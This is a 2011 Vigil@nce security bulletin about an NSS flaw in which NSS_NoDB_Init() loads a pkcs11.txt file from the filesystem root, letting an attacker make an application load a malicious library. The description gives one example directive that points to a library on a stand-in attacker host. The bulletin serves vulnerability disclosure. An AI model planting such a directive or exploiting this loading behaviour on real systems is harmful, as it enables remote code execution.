Vigil@nce: NSS, code execution via pkcs11.txt
November 2011 by Vigil@nce
This bulletin was written by Vigil@nce : http://vigilance.fr/offer
SYNTHESIS OF THE VULNERABILITY
When an attacker can store a malicious filename at the root of the
current directory of an application linked to NSS, he can load a
malicious library, in order to execute code.
– Severity: 2/4
– Creation date: 24/10/2011
IMPACTED PRODUCTS
– Debian Linux
– Microsoft Windows - plateform
– Unix - plateform
DESCRIPTION OF THE VULNERABILITY
The NSS (Network Security Services) library implements
cryptographic features.
The NSS_NoDB_Init() function loads the pkcs11.txt file, which
contains configuration directives. The "library" directive
indicates the name of a library to load. For example:
library=\www.attacker.dom\dir\malicious.lib
However, NSS_NoDB_Init() accepts to load files located at the root
of the filesystem containing the current directory (\pkcs11.txt).
So, if an application linked to NSS is started from a network
share, the pkcs11.txt file is searched at the root of this network
share.
When an attacker can store a malicious filename at the root of the
current directory of an application linked to NSS, he can
therefore load a malicious library, in order to execute code.
The secmod.db file is also searched at the root.
ACCESS TO THE COMPLETE VIGIL@NCE BULLETIN
http://vigilance.fr/vulnerability/NSS-code-execution-via-pkcs11-txt-11095